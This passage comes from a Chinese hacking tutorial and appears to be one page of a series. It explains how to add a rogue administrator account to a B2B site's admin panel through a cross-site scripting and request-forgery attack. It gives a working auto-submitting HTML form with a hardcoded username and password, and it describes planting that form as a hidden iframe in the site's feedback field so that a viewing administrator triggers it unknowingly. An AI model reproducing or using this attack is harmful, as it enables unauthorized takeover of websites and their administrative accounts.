二、利用跨站来添加管理员

首先我们来看下后台添加管理员的主要代码:

代码片段六： <form name="form1" method="post" action="administrator.asp?action=save"> 用户名：<input name="user" type="text" " value=”管理员名”> 初始密码：<input name="pass”  type="password" value=”管理员密码”> <input type="submit" name="Submit" value="添 加" > </from>

稍懂点html知识的你就知道我们的表单代码如何修改了,我们来构造一个简单的表单,代码如下:

代码片段七： <html> <form name="form" method="post" action="http://127.0.0.1/b2b/admin/administrator/administrator.asp? action=save"> <input name="user" value="初学者"> <input name="pass" value="77169"> </form> <SCRIPT language="JavaScript"> document.form.submit() </SCRIPT> </html>

</html>要注意的就是action后的路径和尾部的自动提交的脚本代码,当管理员自动提交这表单时,就会在后台为我们添加上一个名为”初学者”密码为”77169”的管理员,当然还要根据实际情况来构造不同的表单,好了原理说了这么多了,我们还是来实践下吧,先把修改好的表单保存为1.htm上传到自己的空间地址为http://127.0.0.1/1.htm再回到首页在”意见反馈”写入挂马的代码,(我这儿为了演试,把高度和宽度都设为300)再点提交,如图7:

（图7）

再到后台查看反馈信息时,在反馈内容里嵌入了一个高和宽都为300的框架,并自动在后台添加上了一个管理员,如图8:

（图8）

当然,我们还可进一步的来修改用户权限,更改密码等后台的一些基本操作。

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] 下一页